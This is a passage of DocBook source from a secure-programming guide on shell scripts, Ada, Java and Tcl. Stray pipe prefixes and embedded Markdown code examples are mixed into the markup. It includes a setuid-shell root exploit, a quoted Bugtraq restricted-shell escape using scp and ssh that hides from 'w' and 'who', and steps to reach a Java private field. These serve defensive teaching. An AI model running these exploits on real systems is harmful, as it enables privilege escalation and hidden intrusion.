||
For example, on many Bourne shell implementations, doing the following
|
||
will grant root access (thanks to NCSA for describing this
|
||
exploit):
|
||
<!-- http://www.ncsa.uiuc.edu/General/Grid/ACES/security/programming/#setuid-sh-exploit -->
|
||
<programlisting width="61">
|
||
% ln -s /usr/bin/setuid-shell /tmp/-x
|
||
% cd /tmp
|
||
% -x
|
||
</programlisting>
|
||
Some systems may have closed this hole, but the point still stands:
|
||
most command shells aren't intended for writing secure setuid/setgid programs.
|
||
For programming purposes, avoid creating setuid shell scripts, even
|
||
on those systems that permit them.
|
||
Instead, write a small program in another language to clean up the
|
||
environment, then have it call other executables (some of which
|
||
might be shell scripts).
|
||
</para>
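<para>
Such a wrapper can be quite small.
The following is a minimal sketch in C, not a complete solution: the target
path and the particular environment values are assumptions made for
illustration, and a real wrapper would also need to consider open file
descriptors, umask, the current directory, and so on.
</para>

```c
#include <assert.h>
#include <stdio.h>
#include <unistd.h>

/* Path of the real program to run; a hypothetical example location. */
#define TARGET_PROGRAM "/usr/local/libexec/do-task"

/* A minimal, fixed environment; nothing is inherited from the caller. */
static char *const clean_env[] = {
    "PATH=/bin:/usr/bin",
    "IFS= \t\n",
    NULL
};

/* Replace this process with TARGET_PROGRAM, passing the caller's arguments
 * but only the environment above.  Returns -1 if the exec fails; on
 * success it does not return at all. */
int exec_with_clean_env(char *const argv[])
{
    assert(argv != NULL);
    execve(TARGET_PROGRAM, argv, clean_env);
    perror("execve");   /* reached only on failure */
    return -1;
}
```

<para>
A wrapper's main() would simply call exec_with_clean_env(argv) and exit
with a failure status if it returns.
Because execve() is given an explicit environment, values such as ENV and
BASH_ENV set by the caller never reach the target program.
</para>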
|
||
|
||
<para>
|
||
If you still insist on using shell scripting languages, at least
|
||
put the script in a directory where it cannot be moved or changed.
|
||
Set PATH and IFS to known values very early in your script; indeed, the
|
||
environment should be cleaned before the script is called.
|
||
Also, very early on, ``cd'' to a safe directory.
|
||
Use data only from directories that are controlled by trusted users, e.g., /etc,
|
||
so that attackers can't insert maliciously-named files into those directories.
|
||
Be sure to quote every filename passed on a command line, e.g., use
|
||
"$1" not $1, because unquoted filenames containing whitespace will be split.
|
||
Call commands using "--" to disable additional options where you can,
|
||
because attackers may create or pass filenames beginning with dash in the
|
||
hope of tricking the program into processing it as an option.
|
||
Be especially careful of filenames embedding other characters
|
||
(e.g., newlines and other control characters).
|
||
Examine input filenames especially carefully and be very restrictive
|
||
on what filenames are permitted.
|
||
</para>
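<para>
If a helper program in C does the filename checking before any shell script
sees the name, a restrictive check might look like the following sketch.
The set of permitted characters and the length limit are illustrative
choices of mine; pick the smallest set your application really needs.
</para>

```c
#include <assert.h>
#include <string.h>

/* Return 1 if `name` consists only of characters from a conservative
 * allowed list and cannot be mistaken for an option; otherwise return 0. */
int is_safe_filename(const char *name)
{
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyz"
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "0123456789._-";
    size_t len;

    assert(name != NULL);
    len = strlen(name);
    if (len == 0 || len > 255)
        return 0;
    /* Reject option-like names, hidden files, and "." or "..". */
    if (name[0] == '-' || name[0] == '.')
        return 0;
    /* Whitespace, control characters, slashes, and shell metacharacters
     * are not in the allowed list, so strspn() stops before them. */
    return strspn(name, allowed) == len;
}
```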
|
||
|
||
<para>
|
||
If you don't mind limiting your program to only work with GNU tools
|
||
(or if you detect and optionally use the GNU tools instead when
|
||
they are available), you might want
|
||
to use NUL characters as the filename terminator instead of newlines.
|
||
By using NUL characters, rather than whitespace or newlines,
|
||
handling nasty filenames (e.g., those with
|
||
embedded newlines) is much simpler.
|
||
Several GNU tools that output or input filenames can use this format
|
||
instead of the more common ``one filename per line'' format.
|
||
Unfortunately, the name of this option isn't consistent between tools;
|
||
for many tools the name of this option is ``--null'' or ``-0''.
|
||
GNU programs xargs and cpio allow using either --null or -0,
|
||
tar uses --null,
|
||
find uses -print0,
|
||
grep uses either --null or -Z, and
|
||
sort uses either -z or --zero-terminated.
|
||
Those who find this inconsistency particularly disturbing are invited
|
||
to supply patches to the GNU authors;
|
||
I would suggest making sure every program supported ``--null'' since that
|
||
seems to be the most common option name.
|
||
For example, here's one way to move files to a target directory, even
|
||
if there may be a vast number of files and some may have awkward names
|
||
with embedded newlines
|
||
(thanks to Jim Dennis for reminding me of this):
|
||
<programlisting>
|
||
find . -print0 | xargs --null mv --target-directory="$TARG"
|
||
</programlisting>
|
||
<!--
|
||
Noted briefly in:
|
||
http://www.linuxjournal.com//article.php?sid=6060
|
||
-->
|
||
</para>
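<para>
A program of your own can consume the same NUL-terminated format.
Here is a sketch in C using the POSIX getdelim() function; the names
for_each_nul_name and show_name are hypothetical, and the handler simply
prints each name between brackets.
</para>

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

/* Example handler: print one filename between brackets. */
void show_name(const char *name)
{
    printf("[%s]\n", name);
}

/* Read NUL-terminated filenames from `in` and call `handle` on each one.
 * Returns the number of names read, or -1 on a read error. */
long for_each_nul_name(FILE *in, void (*handle)(const char *name))
{
    char *name = NULL;
    size_t capacity = 0;
    ssize_t length;
    long count = 0;

    assert(in != NULL && handle != NULL);
    while ((length = getdelim(&name, &capacity, '\0', in)) != -1) {
        /* getdelim() keeps the delimiter, which here is the NUL itself,
         * so `name` is already a C string, embedded newlines and all. */
        handle(name);
        count++;
    }
    if (ferror(in))
        count = -1;
    free(name);
    return count;
}
```

<para>
Fed the output of ``find . -print0'' on standard input, a call such as
for_each_nul_name(stdin, show_name) treats a filename with an embedded
newline as a single name rather than two.
</para>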
|
||
|
||
<para>
|
||
In a similar vein, I recommend <emphasis>not</emphasis> trusting
|
||
``restricted shells'' to implement secure policies.
|
||
Restricted shells are shells that intentionally prevent users from
|
||
performing a large set of activities - their goal is to force users
|
||
to only run a small set of programs.
|
||
A restricted shell can be useful as a defense-in-depth measure, but
|
||
restricted shells are notoriously hard to configure correctly and as
|
||
configured are often subvertable.
|
||
For example, some restricted shells will start by running some file
|
||
in an unrestricted mode (e.g., ``.profile'') - if a user can change this
|
||
file, they can force execution of that code.
|
||
A restricted shell should be set up to only run a few programs, but
|
||
if any of those programs have ``shell escapes'' to let users run more
|
||
programs, attackers can use those shell escapes to escape the
|
||
restricted shell.
|
||
Even if the programs don't have shell escapes, it's quite likely that
|
||
the various programs can be used together (along with the shell's capabilities)
|
||
to escape the restrictions.
|
||
Of course, if you don't set the PATH of a restricted shell (and allow
|
||
any program to run), then an attacker can use the shell escapes of
|
||
many programs (including text editors, mailers, etc.).
|
||
The problem is that the purpose of a shell is to run other programs,
|
||
but those other programs may allow unintended operations -- and the
|
||
shell doesn't interpose itself to prevent these operations.
|
||
</para>
|
||
|
||
<!--
|
||
|
||
(From Bugtraq)
|
||
|
||
Subject: Restricted Shells
|
||
From: A.Dimitrov <adimitro@bobcat.gcsu.edu>
|
||
Date: 18 Apr 2002 21:12:23 -0000
|
||
To: bugtraq@securityfocus.com
|
||
|
||
I have recently realized a security issue in some
|
||
of the restricted shells on *NIX systems. I am not
|
||
sure if I am the first one to discover the problem
|
||
I am going to discuss but I am sure that it has
|
||
not been posted yet, atleast not that I know of.
|
||
|
||
Basically this is the issue:
|
||
|
||
Affected Systems:
|
||
=================
|
||
Any Unix systems that I am aware of using
|
||
restricted shells (rbash, rksh)
|
||
|
||
Description:
|
||
============
|
||
An authorized user is that is set to use rbash or
|
||
rksh is able to escape the restricted shell
|
||
environment and then furthermore exploit the
|
||
system. The problem comes from the fact thatwhen a
|
||
command is executed from the shell and it is found
|
||
to be a shell procedure then rksh or rbash are
|
||
invoked to execute it.
|
||
|
||
Proof:
|
||
======
|
||
|
||
One needs to store the shell script in a
|
||
world-writable directory like /tmp or /usr/tmp
|
||
so let's assume the server is running sshd (This
|
||
is also exploitable through rsh). In this case
|
||
store in a file called anything you want (I will
|
||
use .tmp123) the following:
|
||
|
||
===
|
||
|
||
/usr/bin/bash
|
||
rm -Rf /tmp/.tmp123
|
||
|
||
===
|
||
|
||
|
||
Then execute the following:
|
||
|
||
$scp ./.tmp123 user@host:/tmp user@host's password:
|
||
|
||
Done.
|
||
|
||
$ssh -l user host '/tmp/.tmp123'
|
||
user@host's password:
|
||
_
|
||
|
||
|
||
You should now have a normal bash shell instead
|
||
of the original rbash.
|
||
Also a great plus to doing this is that whenever
|
||
you follow the procedure above the commands 'w'
|
||
and 'who' cannot detect your presence. However
|
||
'ps' dows show the intruder's presence.
|
||
|
||
Fix:
|
||
====
|
||
I am not aware of any except maybe an attempt to
|
||
retune the system. If anyone has any ideas please
|
||
e-mail me.
|
||
|
||
A. Dimitrov
|
||
System Administrator
|
||
Georgia College & State University
|
||
|
||
|
||
A reply in 18 April 2002 Bugtraq said:
|
||
Subject: Re: Restricted Shells
|
||
From: "Scott T. Cameron" <karn@routehero.com>
|
||
Date: Thu, 18 Apr 2002 17:58:13 -0700
|
||
To: bugtraq@securityfocus.org
|
||
|
||
[snip]
|
||
|
||
With sshd2, you should be able use 'ChrootGroups' or 'ChrootUsers' to fix this problem. Please see sshd2_config(5).
|
||
|
||
|
||
|
||
(but of course, this still shows that restricted shells are hard to
|
||
use correctly).
|
||
|
||
-->
|
||
</sect1>
|
||
|
||
<sect1 id="ada">
|
||
<title>Ada</title>
|
||
<para>
|
||
In Ada95, the Unbounded_String type is often more flexible than the
|
||
String type because it is automatically resized as necessary.
|
||
However, don't store especially sensitive secret values such as passwords
|
||
or secret keys in an Unbounded_String, since core dumps and page areas
|
||
might still hold them later.
|
||
Instead, use the String type for this data, lock it into memory
|
||
while it's used, and overwrite the data as
|
||
soon as possible with some constant value such as (others => ' ').
|
||
Use the Ada pragma Inspection_Point on the object holding the secret
|
||
after erasing the memory.
|
||
That way, you can be certain that
|
||
the object containing the secret will really be erased
|
||
(and that the overwriting won't be optimized away).
|
||
</para>
|
||
|
||
<para>
|
||
It's common for beginning Ada programmers to believe that the
|
||
String type's first index value is always 1, but this isn't true if
|
||
the string is sliced.
|
||
Avoid this error.
|
||
</para>
|
||
|
||
<para>
|
||
It's worth noting that SPARK is
|
||
a ``high-integrity subset of the Ada programming language'';
|
||
SPARK users use a tool called the ``SPARK Examiner'' to check
|
||
conformance to SPARK rules, including flow analysis, and there are
|
||
various supports for full formal proof of the code if desired.
|
||
<ulink url="http://www.sparkada.com">See the SPARK website for more
|
||
information</ulink>.
|
||
To my knowledge, there are no OSS/FS SPARK tools.
|
||
If you're storing passwords and private keys you should still
|
||
lock them into memory if appropriate
|
||
and overwrite them as soon as possible.
|
||
Note that SPARK is often used in environments where paging does not occur.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="java">
|
||
<title>Java</title>
|
||
|
||
<para>
|
||
<!-- Could mention "Core Java 2"; see http://www.amazon.com/
|
||
exec/obidos/ASIN/0130819336/ref=sim_books/102-4729136-4374443 -->
|
||
<!-- ???: Add more information about creating your own domains inside
|
||
a Java program.-->
|
||
If you're developing secure programs using Java,
|
||
frankly your first step (after learning Java)
|
||
is to read the two primary texts for Java security, namely
|
||
Gong [1999]
|
||
and
|
||
McGraw [1999] (for the latter, look particularly at section 7.1).
|
||
You should also look at Sun's posted security code guidelines at
|
||
<ulink url="http://java.sun.com/security/seccodeguide.html">http://java.sun.com/security/seccodeguide.html</ulink>, and
|
||
there's a nice
|
||
<ulink url="http://www-106.ibm.com/developerworks/java/library/j-staticsec.html?loc=dwmain">
|
||
article by Sahu et al. [2002]</ulink>.
|
||
A set of slides describing Java's security model is freely available at
|
||
<ulink url="http://www.dwheeler.com/javasec">http://www.dwheeler.com/javasec</ulink>.
|
||
You can also see McGraw [1998].
|
||
</para>
|
||
|
||
<para>
|
||
Obviously, a great deal depends on the kind of application you're developing.
|
||
Java code intended for use on the client side has a completely different
|
||
environment (and trust model) than code on a server side.
|
||
The general principles apply, of course; for example, you must
|
||
check and filter any input from an untrusted source.
|
||
However, in Java there are some ``hidden'' inputs or potential inputs that you
|
||
need to be wary of, as discussed below.
|
||
Johnathan Nightingale [2000] made an interesting statement
|
||
summarizing many of the issues in Java programming:
|
||
<blockquote>
|
||
<para>
|
||
... the big thing with Java programming is minding your inheritances.
|
||
If you inherit methods from parents, interfaces, or
|
||
parents' interfaces, you risk opening doors to your code.
|
||
</para>
|
||
</blockquote>
|
||
<!-- Secprog, Wed, 1 Nov 2000 18:46:43 -0500, Re: Secure Java programming -->
|
||
</para>
|
||
|
||
<para>
|
||
The following are a few key guidelines, based on Gong [1999],
|
||
McGraw [1999], Sun's guidance, and my own experience:
|
||
|
||
<orderedlist>
|
||
|
||
<listitem><para>
|
||
Do not use public fields or variables; declare them as private and
|
||
provide accessors to them so you can limit their accessibility.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Make methods private unless there is a good reason to do otherwise
|
||
(and if you do otherwise, document why).
|
||
These non-private methods must protect themselves, because they may
|
||
receive tainted data (unless you've somehow arranged to protect them).
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
The JVM may not actually enforce the accessibility modifiers
|
||
(e.g., ``private'') at run-time in an application
|
||
(as opposed to an applet).
|
||
My thanks to John Steven (Cigital Inc.), who pointed this out
|
||
on the ``Secure Programming'' mailing list on November 7, 2000.
|
||
The issue is that it all depends on what class loader
|
||
the class requesting the access was loaded with.
|
||
If the class was loaded with a trusted class loader (including the null/
|
||
primordial class loader),
|
||
the access check returns "TRUE" (allowing access).
|
||
For example, this works
|
||
(at least with Sun's 1.2.2 VM; it might not work with
|
||
other implementations):
|
||
<orderedlist>
|
||
<listitem><para>write a victim class (V) with a public field, compile it.</para></listitem>
|
||
<listitem><para>write an 'attack' class (A) that accesses that field, compile it </para></listitem>
|
||
<listitem><para>change V's public field to private, recompile</para></listitem>
|
||
<listitem><para>run A - it'll access V's (now private) field.</para></listitem>
|
||
</orderedlist>
|
||
</para>
|
||
<para>
|
||
However, the situation is different with applets.
|
||
If you convert A to an applet and run it as an applet
|
||
(e.g., with appletviewer or browser), its class loader is no
|
||
longer a trusted (or null) class loader.
|
||
Thus, the code will throw
|
||
java.lang.IllegalAccessError, with the message that
|
||
you're trying to access a field V.secret from class A.
|
||
</para></listitem>
|
||
<!-- Source: SECPROG
|
||
Date: Tue, 7 Nov 2000 16:52:47 -0500
|
||
From: John Steven jsteven@CIGITAL.COM
|
||
Subject: Re: Java and 'private'
|
||
|
||
I looked into this w/ the Java 1.1 VM Spec., and the 1.2.2 VM source,
|
||
'spent only a short amount of time on it-mileage may vary.
|
||
-->
|
||
|
||
<listitem><para>
|
||
Avoid using static field variables. Such variables are attached to the
|
||
class (not class instances), and classes can be located by any other class.
|
||
As a result, static field variables can be found by any other class, making
|
||
them much more difficult to secure.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Never return a mutable object to potentially malicious code
|
||
(since the code may decide to change it).
|
||
Note that arrays are mutable (even if the array contents aren't),
|
||
so don't return a reference to an internal array with sensitive data.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Never store user-given mutable objects (including arrays of objects)
|
||
directly.
|
||
Otherwise, the user could hand the object to the secure code, let the
|
||
secure code ``check'' the object, and change the data while the secure code
|
||
was trying to use the data.
|
||
Clone arrays before saving them internally, and be careful here
|
||
(e.g., beware of user-written cloning routines).
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Don't depend on initialization.
|
||
There are several ways to allocate uninitialized objects.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Make everything final, unless there's a good reason not to.
|
||
If a class or method is non-final, an attacker could try to extend it
|
||
in a dangerous and unforeseen way.
|
||
Note that this causes a loss of extensibility, in exchange for security.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Don't depend on package scope for security.
|
||
A few packages, such as java.lang, are closed by default, and some
Java Virtual Machines (JVMs) let you close off other packages.
Otherwise, Java packages are not closed.
|
||
Thus, an attacker could introduce a new class inside your package,
|
||
and use this new class to access the things you thought you were protecting.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Don't use inner classes.
|
||
When inner classes are translated into byte codes, the inner class
|
||
is translated into a class accessible to any class in the package.
|
||
Even worse, the enclosing class's private fields silently
|
||
become non-private to permit access by the inner class!
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Minimize privileges.
|
||
Where possible, don't require any special permissions at all.
|
||
McGraw goes further and recommends not signing any code; I say
|
||
go ahead and sign the code (so users can decide to ``run only
|
||
signed code by this list of senders''), but try to write the program
|
||
so that it needs nothing more than the sandbox set of privileges.
|
||
If you must have more privileges, audit that code especially hard.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
If you must sign your code, put it all in one archive file.
|
||
Here it's best to quote McGraw [1999]:
|
||
<blockquote>
|
||
<para>
|
||
The goal of this rule is to prevent
|
||
an attacker from carrying out a mix-and-match
|
||
attack in which the attacker constructs a new applet
|
||
or library that links some of your signed classes together
|
||
with malicious classes, or links together signed classes that you
|
||
never meant to be used together.
|
||
By signing a group of classes together, you make this attack more difficult.
|
||
Existing code-signing systems do an inadequate job of
|
||
preventing mix-and-match attacks, so this rule cannot
|
||
prevent such attacks completely. But using a single archive can't hurt.
|
||
</para>
|
||
</blockquote>
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Make your classes uncloneable.
|
||
Java's object-cloning mechanism allows an attacker to
|
||
instantiate a class without running any of its constructors.
|
||
To make your class uncloneable, just define the following method
|
||
in each of your classes:
|
||
<!-- Originally this said void, not Object; I'm told Object is correct. -->
|
||
<programlisting width="71">
|
||
<![CDATA[
|
||
public final Object clone() throws java.lang.CloneNotSupportedException {
|
||
throw new java.lang.CloneNotSupportedException();
|
||
}
|
||
]]>
|
||
</programlisting>
|
||
</para>
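<para>
As a minimal sketch of how this guard behaves in use (Credential and
UncloneableDemo are hypothetical names invented for this illustration,
not part of any library), the following shows a caller's attempt to
clone such an object failing instead of producing a copy that
bypassed the constructor:
<programlisting width="71">
<![CDATA[
// Hypothetical class used only for illustration.
class Credential {
    private final char[] secret;

    Credential(char[] secret) {
        this.secret = secret.clone();
    }

    // The guard from the text: any attempt to clone fails.
    public final Object clone() throws CloneNotSupportedException {
        throw new CloneNotSupportedException();
    }
}

class UncloneableDemo {
    // Returns true if cloning the object was refused.
    static boolean cloneIsRefused(Credential c) {
        try {
            c.clone();
            return false;
        } catch (CloneNotSupportedException e) {
            return true;
        }
    }

    public static void main(String[] args) {
        Credential c = new Credential("example".toCharArray());
        System.out.println(cloneIsRefused(c)); // true
    }
}
]]>
</programlisting>
Because the method is final, a subclass cannot reintroduce cloning by
overriding it.
</para>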
|
||
<para>
|
||
If you really need to make your class cloneable, then there are some
|
||
protective measures you can take to prevent attackers from redefining
|
||
your clone method.
|
||
If you're defining your own clone method, just make it final.
|
||
If you're not, you can at least prevent the clone method from
|
||
being maliciously overridden by adding the following:
|
||
<programlisting width="71">
|
||
<![CDATA[
|
||
public final Object clone() throws java.lang.CloneNotSupportedException {
  return super.clone();
}
|
||
]]>
|
||
</programlisting>
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Make your classes unserializable.
|
||
Serialization allows attackers to view the internal state of your objects,
|
||
even private portions.
|
||
To prevent this, add this method to your classes:
|
||
<programlisting width="66">
|
||
<![CDATA[
|
||
private final void writeObject(ObjectOutputStream out)
|
||
throws java.io.IOException {
|
||
throw new java.io.IOException("Object cannot be serialized");
|
||
}
|
||
]]>
|
||
</programlisting>
|
||
</para>
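<para>
The guard matters most when a class inherits Serializable from a
superclass. The following is a minimal sketch under that assumption;
BaseRecord, SecretRecord, and SerializationGuardDemo are hypothetical
names made up for this illustration. It shows that an ordinary
Serializable object is written normally, while the guarded subclass
refuses to be written:
<programlisting width="71">
<![CDATA[
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.Serializable;

// Hypothetical superclass; it makes every subclass Serializable too.
class BaseRecord implements Serializable {
    private static final long serialVersionUID = 1L;
    String label = "harmless";
}

// Hypothetical subclass whose state must never be written out.
class SecretRecord extends BaseRecord {
    private static final long serialVersionUID = 1L;
    private String password = "not for export";

    // The guard from the text: refuse every attempt to serialize.
    private final void writeObject(ObjectOutputStream out)
            throws IOException {
        throw new IOException("Object cannot be serialized");
    }
}

class SerializationGuardDemo {
    // Returns true if writing the object to a stream was refused.
    static boolean isRefused(Object o) {
        try (ObjectOutputStream out =
                 new ObjectOutputStream(new ByteArrayOutputStream())) {
            out.writeObject(o);
            return false;
        } catch (IOException e) {
            return true;
        }
    }

    public static void main(String[] args) {
        System.out.println(isRefused(new BaseRecord()));   // false
        System.out.println(isRefused(new SecretRecord())); // true
    }
}
]]>
</programlisting>
</para>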
|
||
<para>
|
||
Even in cases where serialization is okay, be sure to use
|
||
the transient keyword for the fields
|
||
that contain direct handles to system resources and
|
||
that contain information relative to an address space.
|
||
Otherwise, deserializing the class may permit improper access.
|
||
You may also want to identify sensitive information as transient.
|
||
</para>
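<para>
As a small sketch of what transient does (Session and TransientDemo
are hypothetical names invented for this illustration), the following
serializes an object to memory and reads it back; the transient field
is not written, so it comes back with its default value rather than
the original contents:
<programlisting width="71">
<![CDATA[
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

// Hypothetical class: one ordinary field, one sensitive field.
class Session implements Serializable {
    private static final long serialVersionUID = 1L;
    String user;
    transient String authToken; // left out of the serialized form

    Session(String user, String authToken) {
        this.user = user;
        this.authToken = authToken;
    }
}

class TransientDemo {
    // Serializes the session to memory and reads it back.
    static Session roundTrip(Session s) {
        try {
            ByteArrayOutputStream bytes = new ByteArrayOutputStream();
            try (ObjectOutputStream out =
                     new ObjectOutputStream(bytes)) {
                out.writeObject(s);
            }
            ByteArrayInputStream source =
                new ByteArrayInputStream(bytes.toByteArray());
            try (ObjectInputStream in = new ObjectInputStream(source)) {
                return (Session) in.readObject();
            }
        } catch (IOException | ClassNotFoundException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        Session copy = roundTrip(new Session("alice", "tok-123"));
        System.out.println(copy.user);      // alice
        System.out.println(copy.authToken); // null
    }
}
]]>
</programlisting>
Code that reads such an object back must be prepared for the
transient fields to be unset.
</para>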
|
||
|
||
<para>
|
||
If you define your own serializing method for a class,
|
||
it should not pass an internal array to any DataInput/DataOutput
|
||
method that takes an array.
|
||
The rationale: All DataInput/DataOutput methods can be overridden.
|
||
If a Serializable class passes a private array directly to a DataOutput method such as write(byte[] b), then an attacker
|
||
could subclass ObjectOutputStream and override the write(byte [] b)
|
||
method to enable him to access and modify the private array.
|
||
Note that the default serialization does not expose private
|
||
byte array fields to DataInput/DataOutput byte array methods.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Make your classes undeserializable.
Even if your class is not serializable, it may still be deserializable.
|
||
An attacker can create a sequence of bytes that happens
|
||
to deserialize to an instance of your class with values of the
|
||
attacker's choosing.
|
||
In other words, deserialization is a kind of public constructor, allowing
|
||
an attacker to choose the object's state - clearly a dangerous operation!
|
||
To prevent this, add this method to your classes:
|
||
<programlisting width="66">
|
||
<![CDATA[
|
||
private final void readObject(ObjectInputStream in)
|
||
throws java.io.IOException {
|
||
throw new java.io.IOException("Class cannot be deserialized");
|
||
}
|
||
]]>
|
||
</programlisting>
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Don't compare classes by name.
|
||
After all, attackers can define classes with identical names, and if
|
||
you're not careful you can cause confusion by granting these classes
|
||
undesirable privileges.
|
||
Thus, here's an example of the <emphasis>wrong</emphasis> way
|
||
to determine if an object has a given class:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
if (obj.getClass().getName().equals("Foo")) {
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
<para>
|
||
If you need to determine if two objects have exactly the
|
||
same class, instead
|
||
use getClass() on both sides and compare using the == operator.
|
||
Thus, you should use this form:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
if (a.getClass() == b.getClass()) {
|
||
]]>
|
||
</programlisting>
|
||
If you truly need to determine if an object has a given classname, you
|
||
need to be pedantic and be sure to use the current namespace
|
||
(of the current class's ClassLoader).
|
||
Thus, you'll need to use this format:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
if (obj.getClass() == this.getClass().getClassLoader().loadClass("Foo")) {
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
<para>
|
||
This guideline is from McGraw and Felten, and it's a good guideline.
|
||
I'll add that, where possible, it's often a good idea to avoid comparing
|
||
class values anyway.
|
||
It's often better to try to design class methods and interfaces so you
|
||
don't need to do this at all.
|
||
However, this isn't always practical, so it's important to know these tricks.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Don't store secrets (cryptographic keys, passwords, or
|
||
algorithms) in the code or data.
|
||
Hostile JVMs can quickly view this data.
|
||
Code obfuscation doesn't really hide the code from serious attackers.
|
||
</para></listitem>
|
||
|
||
</orderedlist>
|
||
|
||
</para>
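<para>
The two guidelines above about mutable objects (never return one to
untrusted code, and never store a user-given one directly) can be
sketched as follows. KeyHolder and DefensiveCopyDemo are hypothetical
names invented for this illustration, and the four-byte length check
is an arbitrary stand-in for real validation. The constructor copies
the caller's array before checking it, and the accessor hands out a
copy rather than the internal array:
<programlisting width="71">
<![CDATA[
import java.util.Arrays;

// Hypothetical holder of sensitive bytes.
final class KeyHolder {
    private final byte[] key;

    KeyHolder(byte[] key) {
        // Copy first, then validate the copy, so the caller cannot
        // change the data between the check and the use.
        byte[] copy = key.clone();
        if (copy.length != 4) {
            throw new IllegalArgumentException("key must be 4 bytes");
        }
        this.key = copy;
    }

    // Return a copy; the internal array never escapes.
    byte[] getKey() {
        return key.clone();
    }
}

class DefensiveCopyDemo {
    public static void main(String[] args) {
        byte[] callerArray = {1, 2, 3, 4};
        KeyHolder holder = new KeyHolder(callerArray);

        callerArray[0] = 99;     // caller changes its own array later
        holder.getKey()[1] = 99; // caller changes the returned array

        // The holder's internal state is unaffected by both changes.
        System.out.println(Arrays.toString(holder.getKey()));
        // prints [1, 2, 3, 4]
    }
}
]]>
</programlisting>
Calling clone() on a primitive array is safe because the array class
cannot be subclassed; for arrays of objects the copy is shallow, so
mutable elements need the same treatment individually.
</para>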
|
||
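<para>
The guideline above on making classes undeserializable can be
exercised in the same spirit. This is a minimal sketch, assuming a
class that inherits Serializable from a superclass; BaseToken,
GuardedToken, and DeserializationGuardDemo are hypothetical names
invented for this illustration. A byte stream naming the guarded
class is rejected when it is read back:
<programlisting width="71">
<![CDATA[
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

// Hypothetical Serializable superclass.
class BaseToken implements Serializable {
    private static final long serialVersionUID = 1L;
}

// Hypothetical subclass that must only be built by its constructor.
class GuardedToken extends BaseToken {
    private static final long serialVersionUID = 1L;
    int level = 1;

    // The guard from the text: refuse every attempt to deserialize.
    private final void readObject(ObjectInputStream in)
            throws IOException {
        throw new IOException("Class cannot be deserialized");
    }
}

class DeserializationGuardDemo {
    // Produces a byte stream describing the given object.
    static byte[] serialize(Object o) {
        try {
            ByteArrayOutputStream bytes = new ByteArrayOutputStream();
            try (ObjectOutputStream out =
                     new ObjectOutputStream(bytes)) {
                out.writeObject(o);
            }
            return bytes.toByteArray();
        } catch (IOException e) {
            throw new IllegalStateException(e);
        }
    }

    // Returns true if reading an object from the bytes was refused.
    static boolean isRefused(byte[] data) {
        try (ObjectInputStream in =
                 new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.readObject();
            return false;
        } catch (IOException | ClassNotFoundException e) {
            return true;
        }
    }

    public static void main(String[] args) {
        byte[] plain = serialize(new BaseToken());
        byte[] guarded = serialize(new GuardedToken());
        System.out.println(isRefused(plain));   // false
        System.out.println(isRefused(guarded)); // true
    }
}
]]>
</programlisting>
</para>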
|
||
</sect1>
|
||
|
||
<sect1 id="tcl">
|
||
<title>Tcl</title>
|
||
<para>
|
||
Tcl stands for ``tool command language'' and is pronounced ``tickle.''
|
||
Tcl is divided into two parts: a language and a library.
|
||
The language is a simple language, originally intended for issuing commands
|
||
to interactive programs and including basic programming capabilities.
|
||
The library can be embedded in application programs.
|
||
You can find more information about Tcl at sites such as the
|
||
<ulink url="http://www.tcl.tk/">Tcl.tk</ulink> and the
|
||
<ulink url="http://www.sco.com/Technology/tcl/Tcl.html">Tcl WWW Info</ulink>
|
||
web page and the comp.lang.tcl FAQ launch page at
|
||
<ulink url="http://www.tclfaq.wservice.com/tcl-faq">http://www.tclfaq.wservice.com/tcl-faq</ulink>.
|
||
My thanks go to Wojciech Kocjan for providing some of this detailed
|
||
information on using Tcl in secure applications.
|
||
</para>
|
||
|
||
<para>
|
||
For some security applications, especially interesting components of Tcl
|
||
are Safe-Tcl (which creates a sandbox in Tcl)
|
||
and Safe-TK (which implements a sandboxed portable GUI for Safe Tcl), as
|
||
well as the WebWiseTclTk Toolkit which permits Tcl packages to be automatically
|
||
located and loaded from anywhere on the World Wide Web.
|
||
You can find more about the latter from
|
||
<ulink url="http://www.cbl.ncsu.edu/software/WebWiseTclTk">http://www.cbl.ncsu.edu/software/WebWiseTclTk</ulink>.
|
||
It's not clear to me how much code review this has received.
|
||
</para>
|
||
|
||
<para>
|
||
Tcl's original design goal of being a small, simple
|
||
language resulted in a language that was originally somewhat limiting
|
||
and slow.
|
||
For an example of the limiting weaknesses in the original language, see
|
||
<ulink url="http://sdg.lcs.mit.edu/~jchapin/6853-FT97/Papers/stallman-tcl.html">
|
||
Richard Stallman's ``Why You Should Not Use Tcl''</ulink>.
|
||
